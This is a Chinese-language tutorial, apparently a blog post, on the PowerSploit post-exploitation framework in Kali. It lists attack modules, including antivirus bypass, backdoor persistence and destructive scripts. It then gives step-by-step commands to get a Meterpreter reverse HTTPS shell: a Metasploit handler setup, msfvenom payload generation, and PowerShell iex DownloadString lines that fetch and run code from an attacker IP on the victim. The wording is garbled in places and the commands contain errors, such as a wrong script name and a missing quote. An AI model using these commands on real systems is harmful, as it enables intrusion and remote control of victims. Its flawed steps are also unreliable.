kali PowerSploit渗透使用教程

PowerSploit

PowerSploit是一款基于PowerShell的后浸透(Post-Exploitation)框架软件,包含很多PowerShell攻击脚本,它们主要用于浸透中的信息侦探、权限提升、权限维持。其GitHub地址为https://github.com/PowerShellMafia/PowerSploit
 

PowerSploit的装置

这里经过Kali下载PowerSploit,首先输入git命令下载程序目录。
git clone https://github.com/PowerShellMafia/PowerSploit
 

下载PowerSploit

接着输入以下命令开启Apache效劳。
service apache2 start
 

PowerSploit各模块的功用

  1. AntivirusBypass:发现杀毒软件的查杀特征。
  2. CodeExecution:在目的主机上执行代码。
  3. Exfiltration:目的主机上的信息搜集工具。
  4. Mayhem:蓝屏等毁坏性脚本。
  5. Persistence:后门脚本(耐久性控制)。
  6. Recon:以目的主机为跳板停止内网信息侦查。
  7. ScriptModification:在目的主机上创立或修正脚本。

 

PowerSploit脚本攻击实战

PowerSploit下的各类攻击脚本相当得多,基于篇幅问题,不可能对每一个脚本都停止细致的引见。
 

lnvoke-Shellcode

CodeExecution模块下的lnvoke-Shellcode脚本常用于将ShellCode插入指定的进程ID或本地PowerShell中,两种常用的反弹Meterpreter Shell办法。

1.直接执行ShellCode反弹Meterpreter Shell
首先在MSF里运用windows/x64/meterpreter/reverse_https模块停止反弹,设置的内容。
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.6.120
set lport 4444
show options
run

运用msfvenom命令生成一个PowerShell脚本木马。
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.6.120 lport=4444 -f powershell -o /var/www/test

接着在目的机PowerShell下输入以下命令下载该脚本。
iex(New-Object Net.WebClient).DownloadString("http://192.168.6.120/PowerSploit-master/CodeExecution/Invoke-DllInjection.ps1")

接着输入以下命令下载木马。
iex (New-Object Net.WebClient).DownloadString("http://192.168.6.120/test)

接着在PowerShell下运转以下命令。
Invoke-shellcode -shellcode ($buf) -Force

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞12赞赏 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片